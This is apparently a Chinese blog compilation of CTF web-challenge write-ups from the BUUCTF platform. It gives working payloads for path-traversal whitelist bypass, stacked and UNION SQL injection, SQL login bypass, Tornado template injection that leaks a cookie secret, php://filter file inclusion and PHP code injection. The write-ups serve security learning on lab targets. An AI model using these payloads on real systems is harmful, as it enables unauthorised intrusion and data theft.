[HCTF 2018]WarmUp
开局一张图,看源码,提示source.php
那么我们直接看看~
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>源码里面有hint.php,看了flag not here, and flag in ffffllllaaaagggg
明白位置之后想办法绕过然后读取文件,于是
http://44a1c579-f956-49c8-a208-dda1ea28fe38.node3.buuoj.cn/source.php?file=source.php?/../../../../ffffllllaaaagggg把source.php当成一个目录,逐级向上访问,用?截断即可。
[强网杯 2019]随便注
随便写点内容,得到以下情况:
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);禁掉了select,但是对于MySQL,我们可以通过handler关键字来查询。也没有禁用show和use。
同时也存在堆叠注入。
那么payload也就直截了当了。
先拿数据库名:
1';SHOW DATABASES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BSHOW+DATABASES%3B--%2B再利用堆叠找表名:
1';USE ctftraining;SHOW TABLES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BUSE+ctftraining%3BSHOW+TABLES%3B--%2B
array(1) {
[0]=>
string(10) "FLAG_TABLE"
}
array(1) {
[0]=>
string(4) "news"
}
array(1) {
[0]=>
string(5) "users"
}
1';USE supersqli;SHOW TABLES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BUSE+supersqli%3BSHOW+TABLES%3B--%2B
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}然后我们来看看内容;
1';USE supersqli;HANDLER `1919810931114514` OPEN AS a;HANDLER a READ FIRST;HANDLER a CLOSE;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27;USE%20supersqli;HANDLER%20`1919810931114514`%20OPEN%20AS%20a;HANDLER%20a%20READ%20FIRST;HANDLER%20a%20CLOSE;--+
array(1) {
[0]=>
string(42) "flag{b3c9350f-3de0-4576-a91e-352079c88d39}"
}得到flag
顺便写个彩蛋:
1';USE ctftraining;HANDLER news OPEN AS a;HANDLER a READ FIRST;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a CLOSE;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1';USE ctftraining;HANDLER news OPEN AS a;HANDLER a READ FIRST;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a CLOSE;--+
array(4) {
[0]=>
string(1) "1"
[1]=>
string(3) "dog"
[2]=>
string(282) "The domestic dog (Canis lupus familiaris when considered a subspecies of the wolf or Canis familiaris when considered a distinct species)[4] is a member of the genus Canis (canines), which forms part of the wolf-like canids,[5] and is the most widely abundant terrestrial carnivore."
[3]=>
string(10) "1571838684"
}
array(4) {
[0]=>
string(1) "2"
[1]=>
string(3) "cat"
[2]=>
string(241) "The cat or domestic cat (Felis catus) is a small carnivorous mammal.[1][2] It is the only domesticated species in the family Felidae.[4] The cat is either a house cat, kept as a pet, or a feral cat, freely ranging and avoiding human contact."
[3]=>
string(10) "1571838684"
}
array(4) {
[0]=>
string(1) "3"
[1]=>
string(4) "bird"
[2]=>
string(235) "Birds, also known as Aves, are a group of endothermic vertebrates, characterised by feathers, toothless beaked jaws, the laying of hard-shelled eggs, a high metabolic rate, a four-chambered heart, and a strong yet lightweight skeleton."
[3]=>
string(10) "1571838684"
}
array(4) {
[0]=>
string(1) "4"
[1]=>
string(4) "flag"
[2]=>
string(37) "Flag is in the database but not here."
[3]=>
string(10) "1571838684"
}[SUCTF 2019]EasySQL
这题说是比赛时有源码,所以网上找来源码做做
所以这里存在两个payload;
第一个:
*,1直接查全部
第二个:
1;set sql_mode=PIPES_AS_CONCAT;select 1将MySQL的管道改成连接字符串,即可查到flag
[极客大挑战 2019]EasySQL
Payload
/check.php?username=1'OR'1'='1&password=1'OR'1'='1直接万能密码就完事了,这样相当于拼接了前面和后面的引号,所以可以拿到flag。。。
[极客大挑战 2019]Havefun
一只猫;F12看看源码
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
那我们操作一下:
http://4875f557-8a5e-4290-85cf-419fe3fe927d.node3.buuoj.cn/?cat=dog拿到flag。。。
[护网杯 2018]easy_tornado
三个文件;
/flag.txt
flag in /fllllllllllllag
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))暗示我们要来一波文件读取
注意我们此时地址栏内大致是这样的:
http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/file?filename=/flag.txt&filehash=462ba60d88adff345e29fb730bb00dad用人话说,就是构造一个filehash,但是我们不知道cookie_secret,可能这个是个挺长的东西
于是百度一波,发现了可以利用一个类似模板注入的方式操作
于是先来一波操作
http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/error?msg={{handler.settings}}拿到cookie_secret
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'bb610769-839d-4594-a36b-4522701241bb'} 然后我们再算下md5
import hashlib
cv = 'bb610769-839d-4594-a36b-4522701241bb'
def md5(s):
return hashlib.md5(s.encode('UTF-8')).hexdigest()
md5(cv + md5('/fllllllllllllag'))
访问得到flag
http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=9b6438bb1920a3e20cc59e93c0224478[极客大挑战 2019]Secret File
F12得到Archive_room.php
然后我们操作一波,发现需要用Burpsuite卡一下。那就卡一下,得到secr3t.php
得到源码
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>需要来一个文件包含之类的操作
PHP伪协议
http://cdc9247f-dae2-47bd-99f6-d34b5ceb40b0.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php解码
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">ååï¼ä½ æ¾å°æäºï¼å¯æ¯ä½ çä¸å°æQAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "æå°±å¨è¿é";
$flag = 'flag{961d16f2-65b1-47d7-9ca5-13c46b17ae03}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>得到flag。
[ACTF2020 新生赛]Include
PHP伪协议读取源码。
Payload
http://eafba8d5-8d65-4aea-a535-21e1406b0db5.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php[极客大挑战 2019]LoveSQL
注入一下试试
http://12941d71-aa31-4e54-9151-a28205ddac5e.node3.buuoj.cn/check.php?username=flag&password=mi' UNION SELECT '1','2','3可以正常回显
那么我们就随便再注入下
password=mi' UNION SELECT '1',group_concat('',table_name),'3' FROM information_schema.tables WHERE table_schema='geek' UNION SELECT 1,1,'2得到列名
password=mi' UNION SELECT '1',group_concat('',column_name),'3' FROM information_schema.columns WHERE table_name='l0ve1ysq1' UNION SELECT 1,1,'2得到行
password=mi' UNION SELECT '1',group_concat('',username),'3' FROM l0ve1ysq1 UNION SELECT 1,1,'2得到内容
password=mi' UNION SELECT '1',group_concat('',password),'3' FROM l0ve1ysq1 WHERE username='flag' UNION SELECT 1,1,'2[RoarCTF 2019]Easy Calc
一开始试图凑INF和NAN实现PHP注入……然而不行,没法执行
上网搜WP得知是前面加空格。。。
得到名字
calc.php? num=1;var_dump(scandir(chr(47)))得到flag
calc.php? num=1;var_dump(file_get_contents(CHR(47).CHR(102).CHR(49).CHR(97).CHR(103).CHR(103)))
Comments NOTHING